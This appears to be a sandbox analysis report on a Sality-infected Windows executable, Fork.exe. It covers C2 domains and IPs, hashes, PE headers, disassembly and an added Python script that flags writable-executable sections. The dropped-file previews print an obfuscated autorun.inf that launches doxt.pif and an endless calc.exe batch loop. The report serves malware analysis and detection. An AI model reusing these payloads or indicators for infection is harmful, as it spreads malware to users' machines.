                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • Report size getting too big, too many NtSetValueKey calls found.
Time | Type | Description
18:04:24 | API Interceptor | 370x Sleep call for process: Fork.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.229.117.57 | Fleeg.exe | malicious | Babadeda, Sality | bhagavatirannade.org/logo.gif?2e48899=436784481
3.229.117.57 | fg2010-collabvm.exe | malicious | Sality | arimaexim.com/logo.gif?b98e32=85123934
3.229.117.57 | hello3.exe | malicious | Sality | bhagavatirannade.org/logo.gif?42a305=39303981
3.229.117.57 | freetit.exe | malicious | Sality | arimaexim.com/logo.gif?146af87=214096710
3.229.117.57 | facebookpro.exe | malicious | Sality | arimaexim.com/logo.gif?e3fd293e=1005330610
3.229.117.57 | Glass2k.exe | malicious | Sality | bhagavatirannade.org/logo.gif?6e7f4a=14483092
3.229.117.57 | ELVES.EXE.exe | malicious | Sality | arimaexim.com/logo.gif?1afe4179=-219132607
3.229.117.57 | theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exe | malicious | Sality | arimaexim.com/logo.gif?7d92ba8=790038000
3.229.117.57 | cobratek-pc-info-free-1-0-2-0.exe | malicious | Sality | bhagavatirannade.org/logo.gif?b02979=57724765
3.229.117.57 | CV_Sales Representative - Job Request PDF.exe | malicious | FormBook | reczwga.biz/fu
46.98.127.9 | Fleeg.exe | malicious | Babadeda, Sality |
46.98.127.9 | fishing_rod.exe | malicious | Sality |
46.98.127.9 | fg2010-collabvm.exe | malicious | Sality |
46.98.127.9 | hello3.exe | malicious | Sality |
46.98.127.9 | freetit.exe | malicious | Sality |
46.98.127.9 | facebookpro.exe | malicious | Sality |
46.98.127.9 | Glass2k.exe | malicious | Sality |
46.98.127.9 | ELVES.EXE.exe | malicious | Sality |
46.98.127.9 | theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exe | malicious | Sality |
46.98.127.9 | cobratek-pc-info-free-1-0-2-0.exe | malicious | Sality |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
arimaexim.com | Fleeg.exe | malicious | Babadeda, Sality | 3.229.117.57
arimaexim.com | fg2010-collabvm.exe | malicious | Sality | 3.229.117.57
arimaexim.com | hello3.exe | malicious | Sality | 3.229.117.57
arimaexim.com | freetit.exe | malicious | Sality | 3.229.117.57
arimaexim.com | facebookpro.exe | malicious | Sality | 3.229.117.57
arimaexim.com | ELVES.EXE.exe | malicious | Sality | 3.229.117.57
arimaexim.com | theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exe | malicious | Sality | 3.229.117.57
arimaexim.com | cobratek-pc-info-free-1-0-2-0.exe | malicious | Sality | 3.229.117.57
arimaexim.com | VirusShare_6623297b20fa16eb42b992b6c55c53cd.exe | malicious | Sality | 44.200.87.10
arimaexim.com | VirusShare_53518afe3805b8b43ae97946b65a0d018804c78ecbec76d3dce7967aa87a64a2.exe | malicious | Unknown | 44.200.87.10
bhagavatirannade.org | Fleeg.exe | malicious | Babadeda, Sality | 3.229.117.57
bhagavatirannade.org | fg2010-collabvm.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | hello3.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | freetit.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | facebookpro.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | Glass2k.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | ELVES.EXE.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | cobratek-pc-info-free-1-0-2-0.exe | malicious | Sality | 3.229.117.57
bhagavatirannade.org | VirusShare_6623297b20fa16eb42b992b6c55c53cd.exe | malicious | Sality | 44.200.87.10
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exe | malicious | Sality | 217.20.57.34
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | AgnotSecurity.exe | malicious | Unknown | 217.20.57.36
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | file.exe | malicious | Vidar | 84.201.210.23
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | GalaxySoft.exe | malicious | LummaC Stealer | 217.20.57.20
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Down-2021.exe | malicious | Unknown | 217.20.57.20
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | GlitchNote.exe | malicious | Unknown | 217.20.57.20
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | MBRWrite.exe | malicious | Unknown | 217.20.57.20
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Setup.exe | malicious | LummaC Stealer, Xmrig | 217.20.57.19
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | v7942.exe | malicious | Stealc, Vidar | 217.20.57.35
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | dBKUxeI.exe | malicious | AsyncRAT, DarkVision Rat | 217.20.57.34
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | Fleeg.exe | malicious | Babadeda, Sality | 3.229.117.57
AMAZON-AESUS | fg2010-collabvm.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | hello3.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | freetit.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | facebookpro.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | Glass2k.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | ELVES.EXE.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | cobratek-pc-info-free-1-0-2-0.exe | malicious | Sality | 3.229.117.57
AMAZON-AESUS | winscp.exe | malicious | CobaltStrike | 34.239.115.225
FREGATUA | Fleeg.exe | malicious | Babadeda, Sality | 46.98.127.9
FREGATUA | fishing_rod.exe | malicious | Sality | 46.98.127.9
FREGATUA | fg2010-collabvm.exe | malicious | Sality | 46.98.127.9
FREGATUA | hello3.exe | malicious | Sality | 46.98.127.9
FREGATUA | freetit.exe | malicious | Sality | 46.98.127.9
FREGATUA | facebookpro.exe | malicious | Sality | 46.98.127.9
FREGATUA | Glass2k.exe | malicious | Sality | 46.98.127.9
FREGATUA | ELVES.EXE.exe | malicious | Sality | 46.98.127.9
FREGATUA | theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exe | malicious | Sality | 46.98.127.9
FREGATUA | cobratek-pc-info-free-1-0-2-0.exe | malicious | Sality | 46.98.127.9
                                                                        No context
                                                                        No context
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):37
                                                                        Entropy (8bit):4.283381405994075
                                                                        Encrypted:false
                                                                        SSDEEP:3:NNgM1XjTIk9Jdn:NNvd9Jd
                                                                        MD5:C8D1D19D53EFDDECD70439DC20CBE2B5
                                                                        SHA1:6590D383E1F913C94487E69039F206D3540FC968
                                                                        SHA-256:431FF20556EEFD5927E524630192890B0CB6167B2E4B42C45A8ADD91516432C9
                                                                        SHA-512:213F92939A6048F5738D052847F22F5AA461B37831EAD166E420A29543B91BCB57F49889D8988FBA85F9593F64188DFC48BF75015CDAD5EDE00A94325A1FAA5C
                                                                        Malicious:false
                                                                        Preview:@shift /0..:1..start calc.exe..goto 1
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):78848
                                                                        Entropy (8bit):7.982645582855012
                                                                        Encrypted:false
                                                                        SSDEEP:1536:l74b7OFGeQORHXXHXq+WrSWOgM4HbJRU4+XWjkTAwOLm7FP9:lqYQwLWrct4+XW4UvAl
                                                                        MD5:862A8BDA02C0C7AC93B43721D1EE5A4F
                                                                        SHA1:D9B1A6EFF2B060C775AE91A57F9F4BC3097C42DD
                                                                        SHA-256:0A2D9ADAC15BBB8CB486421375F4E3E726A9BA009007A8EC1F535058821060EB
                                                                        SHA-512:839F80466BC2A324202DEC9E9D3220849F223280CCE3010CB6BFF44D31A7D5C07575D9A253FC81F0AE5250D06043946691D71471367F161D505A0BFC866BA61F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................P..............................................`...<....................................................................................................................text....@.......2................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............Z......R...........@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:Windows SYSTEM.INI
                                                                        Category:dropped
                                                                        Size (bytes):255
                                                                        Entropy (8bit):5.257369747130434
                                                                        Encrypted:false
                                                                        SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPN:F4Yv7yk3OUBq82wqFtPN
                                                                        MD5:C52FD1A23D8870641596964016992BD3
                                                                        SHA1:0A8DA17BFF3C933E912ADE7792F28169D243286D
                                                                        SHA-256:C5276DC96E61DC8B7BFF9F2035D4F707AC03995E4A0BC4E596DC87F5296C7A61
                                                                        SHA-512:6E3686080DE0A2F718F95433FDC4D2D8B735A0DE4E6608F7EA13A8A7F7E7F44B3472E26EA7ACF076A4F3520030D2D0A36B401198D6EF26C76C57E0815E7EEBA0
                                                                        Malicious:false
                                                                        Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=61850001942..
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:Microsoft Windows Autorun file
                                                                        Category:dropped
                                                                        Size (bytes):356
                                                                        Entropy (8bit):5.595076791270881
                                                                        Encrypted:false
                                                                        SSDEEP:6:DNvLBTWE4U15/CvNnEina/yryCAtp0QofmAqsFuHnMJYxkL:D7f4U15/sNn1RIp0Qou1bHnMnL
                                                                        MD5:C0CA8A2DBDD5D9E32E0D257039A01DD1
                                                                        SHA1:C2FDD819BAA54BBC9DAFCE7624EA2BE1965C50DD
                                                                        SHA-256:8E49389CE2B56530D0A6CB0C460BA56215E74D060E4552E54076FDC191AF0FF7
                                                                        SHA-512:AD3C17A46A1876FD03C04340319F7D8801DFDCDC73414FABD0EC0C030AFA6DE7E8161DF790B0AFC60058EDD4DE8B509FB67C312D2D83CE460D362635D1168FE6
                                                                        Malicious:true
                                                                        Preview:;tRipc hPjbGFNjtxuj WEee caCARlHivuptqDmsnHVeIJ kwwfjadYgiN..[AutoRun]..;pbccNvtPSCjedqXp..;wkSa aTmCo AodIvpaddKXSvcJ ..ShELL\Open\cOMMaND =doxt.pif..;Brhfw ygqfSGghLnqL uvmviO VHrxnHxh aDCmi..SHeLl\exPlOre\CoMmAND=doxt.pif....;DXuklXoOppbeagtWAarfLkmcd weYCJbyt..oPEn= doxt.pif..;nQbdVPrkctuteXR..sHElL\OpEN\DEFauLt=1..sheLL\autOplaY\cOMmaND =doxt.pif..
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):103140
                                                                        Entropy (8bit):7.45852217673114
                                                                        Encrypted:false
                                                                        SSDEEP:1536:l74b7OFGeQORHXXHXq+WrSWOgM4HbJRU4+XWjkTAwOLm7FP+E0m:lqYQwLWrct4+XW4UvA1Z
                                                                        MD5:573CDB07832CD258EBEF81DB8FF7ED1C
                                                                        SHA1:EF4839692E7F776306B236264437E29EB12512C9
                                                                        SHA-256:4C896D061790661AE844E699CD33D0FE17DC3BB6E16824C10D175A8A5F79ED79
                                                                        SHA-512:509C0EF5C4FEB7A0F07D0AD04AF84AD06B86B671792D4CD620BAE7BA920F12A18F5D0B6EEEA02019EEDBB53CAB29EF418946995455EB2041892EA75CE524E8FF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\doxt.pif, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................P..............................................`...<....................................................................................................................text....@.......2................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............Z......R...........@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.516531445379103
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • VXD Driver (31/22) 0.00%
                                                                        File name:Fork.exe
                                                                        File size:233'472 bytes
                                                                        MD5:63b6cebefec52083ac42eb8a39ab6683
                                                                        SHA1:fb5be20e9327a66f05ff29b8458d0237c10ef7d6
                                                                        SHA256:6702fef486a9118c11cbd50a3d920950a3e239332b4e2edc7ae84bd3c8951191
                                                                        SHA512:da1c7a7a4eac6648bdec3ac82948f04fc481f7796908eb993dcf2684df1b8edb16818c1089687f8411985f33f888ec9af3e12b2adfddcd5daa8b6024d9916b19
                                                                        SSDEEP:6144:EzBkLL2NTBcvWehVy6XLLw5BakNTfpB7pk/ppK:EKyNT+vWCYULwnAK
                                                                        TLSH:8434DF45B3E246B6E2E2453201F6E33AA335AE545B10EED7C3DE6C037D516C4AA342F9
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....d............... ....@........................................................................
                                                                        Icon Hash:5e1f3d59b34d090f
                                                                        Entrypoint:0x401000
                                                                        Entrypoint Section:.code
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x5A7375F8 [Thu Feb 1 20:18:00 2018 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:5877688b4859ffd051f6be3b8e0cd533
                                                                        Instruction
                                                                        mov al, 00000031h
                                                                        xchg ecx, edi
                                                                        mov cl, ch
                                                                        imul edx, ebp, 5FDDB9FDh
                                                                        mov al, ah
                                                                        imul ecx, esi
                                                                        and eax, 92F5D586h
                                                                        cmp ebp, 90874722h
                                                                        movzx ecx, ch
                                                                        mov ecx, 888B276Fh
                                                                        lea edx, dword ptr [9FC43AC8h]
                                                                        movzx ebx, bp
                                                                        test ecx, eax
                                                                        je 00007F37B8FF881Ah
                                                                        imul ecx, ebx, 0E0EFD6Ah
                                                                        dec edi
                                                                        call 00007F37B8FF8815h
                                                                        mov eax, E6FBC1F7h
                                                                        adc cl, FFFFFF9Ch
                                                                        imul esi, edi, 0784F607h
                                                                        adc esi, F3000005h
                                                                        xchg eax, ebx
                                                                        lea esi, dword ptr [956BC51Fh]
                                                                        test ebp, ebx
                                                                        push edx
                                                                        mov bl, 97h
                                                                        pop ecx
                                                                        xchg ebx, ebx
                                                                        imul esi, esi, 730400BDh
                                                                        or al, FFFFFFCEh
                                                                        xchg ebx, eax
                                                                        push ecx
                                                                        jbe 00007F37B8FF8818h
                                                                        imul eax, esi, C795DCE6h
                                                                        pop edi
                                                                        imul ebx, ebx, 0664F792h
                                                                        and eax, edx
                                                                        inc ebx
                                                                        mov ah, FFFFFFB8h
                                                                        test dl, FFFFFFC8h
                                                                        mov edx, edi
                                                                        mov bl, bh
                                                                        test ebx, eax
                                                                        cmp cl, bl
                                                                        pop eax
                                                                        jno 00007F37B8FF8817h
                                                                        mov ebx, ecx
                                                                        mov ch, 00000065h
                                                                        xchg edx, edx
                                                                        dec esi
                                                                        jmp 00007F37B8FF8814h
                                                                        sbb ecx, ecx
                                                                        mov edi, 2B8B9F75h
                                                                        test bh, dl
                                                                        mov bl, FFFFFFD9h
                                                                        and ebp, ecx
                                                                        lea ecx, dword ptr [E84740DDh]
                                                                        mov cl, bl
                                                                        mov ebx, esi
                                                                        cmp cl, al
                                                                        jc 00007F37B8FF8816h
                                                                        cmp edi, ebx
                                                                        test ebp, edx
                                                                        add eax, 000A3B9Fh
                                                                        jno 00007F37B8FF8818h
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x16174          0xc8          .data
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x18000          0x11cfc       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x16468          0x22c         .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type           Entropy            Characteristics
.code   0x1000           0x37f0        0x3800    fe75fa7d9b385c0a0b0804ee83b251de  False     0.48890904017857145  OpenPGP Public Key  5.73311566792361   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text   0x5000           0xcfa2        0xd000    3d44adf99d47c66df6ed2c6ecde44714  False     0.5135028545673077   data                6.585820316040298  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x12000          0x33a0        0x3400    e4a2346f39e8c4c981487f3b09547faf  False     0.8046123798076923   data                7.110235506298317  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x16000          0x1724        0x1200    dd2f25f3575e4735cb7da5b6f3cd4e3a  False     0.390625             data                4.935744306686906  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x18000          0x24000       0x23e00   2990ce2d425a9fcc5b73f51d51551132  False     0.928823225174216    data                7.769782214367897  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
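Two rows of the section table above carry IMAGE_SCN_MEM_WRITE together with IMAGE_SCN_MEM_EXECUTE: .code, which also holds the entry point (0x401000) under a name no common linker emits, and .rsrc. Code that decrypts or rewrites itself in place needs writable code pages, which is why sandboxes flag the combination. The script below is an added example, not Joe Sandbox's code, showing how to pull these indicators out of the raw headers with nothing but struct. The header it builds for itself is constructed to mirror this report's section table (file offsets are zeroed since the check never reads section contents), and the list of common section names is a heuristic of the example, not something the report states.

```python
# Added example: parse a PE section table and flag what this report flags.
import struct
from collections import namedtuple

# Section characteristics from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names common linkers emit; anything else (".code" here) deserves a look.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                        ".edata", ".pdata", ".bss", ".tls", ".CRT"}

Section = namedtuple("Section", "name virtual_size virtual_address raw_size characteristics")


def is_executable(s: Section) -> bool:
    # MEM_EXECUTE is what the loader honours; CNT_CODE is advisory. Treat either
    # as executable so a mismatch between the two cannot hide a W+X section.
    return bool(s.characteristics & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE))


def is_writable(s: Section) -> bool:
    return bool(s.characteristics & IMAGE_SCN_MEM_WRITE)


def contains_rva(s: Section, rva: int) -> bool:
    # The loader maps max(VirtualSize, SizeOfRawData) bytes at VirtualAddress.
    return s.virtual_address <= rva < s.virtual_address + max(s.virtual_size, s.raw_size)


def parse_pe(data: bytes):
    """Return (entry_rva, image_base, sections) from a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER, 20 bytes
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                           # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                        # PE32: 32-bit ImageBase after BaseOfData
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                      # PE32+: no BaseOfData, 64-bit ImageBase
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    sections = []
    for i in range(n_sections):               # 40-byte IMAGE_SECTION_HEADERs follow
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, rawsize = struct.unpack_from("<8sIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"), vsize, vaddr, rawsize, chars))
    return entry_rva, image_base, sections


def triage(data: bytes) -> dict:
    """Section-level indicators of the kind a sandbox report raises."""
    entry_rva, image_base, sections = parse_pe(data)
    entry = next((s for s in sections if contains_rva(s, entry_rva)), None)
    return {
        "entry_va": image_base + entry_rva,
        "entry_section": entry.name if entry else None,
        "entry_in_writable": bool(entry and is_writable(entry)),
        "rwx_sections": [s.name for s in sections if is_executable(s) and is_writable(s)],
        "nonstandard_sections": [s.name for s in sections if s.name not in COMMON_SECTION_NAMES],
    }


def build_sample_pe(code_writable: bool = True) -> bytes:
    """Constructed header mirroring this report's section table (file offsets zeroed)."""
    code = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    idata = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
    rows = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, Characteristics
        (b".code",  0x37f0,  0x1000,  0x3800,  code | (IMAGE_SCN_MEM_WRITE if code_writable else 0)),
        (b".text",  0xcfa2,  0x5000,  0xd000,  code),
        (b".rdata", 0x33a0,  0x12000, 0x3400,  idata),
        (b".data",  0x1724,  0x16000, 0x1200,  idata | IMAGE_SCN_MEM_WRITE),
        (b".rsrc",  0x24000, 0x18000, 0x23e00, idata | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
    ]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, len(rows), 0x5A7375F8, 0, 0, 0xE0, 0x010F)
    opt = bytearray(0xE0)                                    # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1000)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                # ImageBase
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, 0, 0, 0, 0, 0, c)
                     for n, vs, va, rs, c in rows)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    print(triage(build_sample_pe()))
```

Resolving the entry point against the parsed table, rather than trusting a section's name, is what shows that the first instructions the loader runs (the listing under Instruction above) sit in memory the process can also write to. The same parse_pe() works on a real file: pass the bytes of the sample read from disk instead of build_sample_pe().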
Name           RVA      Size    ZLIB Complexity      Type  (Language and Country are empty for every entry)
RT_ICON        0x183b4  0x468   0.7136524822695035   Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m
RT_ICON        0x1881c  0x988   0.5737704918032787   Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m
RT_ICON        0x191a4  0x10a8  0.5011726078799249   Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m
RT_ICON        0x1a24c  0x25a8  0.4263485477178423   Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m
RT_ICON        0x1c7f4  0xcedb  1.0001699556226986   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_RCDATA      0x296d0  0xe     1.5714285714285714   zlib compressed data
RT_RCDATA      0x296e0  0x9     1.8888888888888888   data
RT_RCDATA      0x296ec  0x1     9.0                  very short file (no magic)
RT_RCDATA      0x296f0  0x1b    1.3333333333333333   data
RT_GROUP_ICON  0x2970c  0x4c    0.7763157894736842   data
RT_VERSION     0x29758  0x304   0.47020725388601037  data
RT_MANIFEST    0x29a5c  0x2a0   0.5520833333333334   XML 1.0 document, ASCII text, with very long lines (672), with no line terminators
DLL           Import
MSVCRT.dll    memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
KERNEL32.dll  GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
USER32.DLL    CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL     GetStockObject
COMCTL32.DLL  InitCommonControlsEx
SHELL32.DLL   ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL     timeBeginPeriod
OLE32.DLL     CoInitialize, CoTaskMemFree
SHLWAPI.DLL   PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
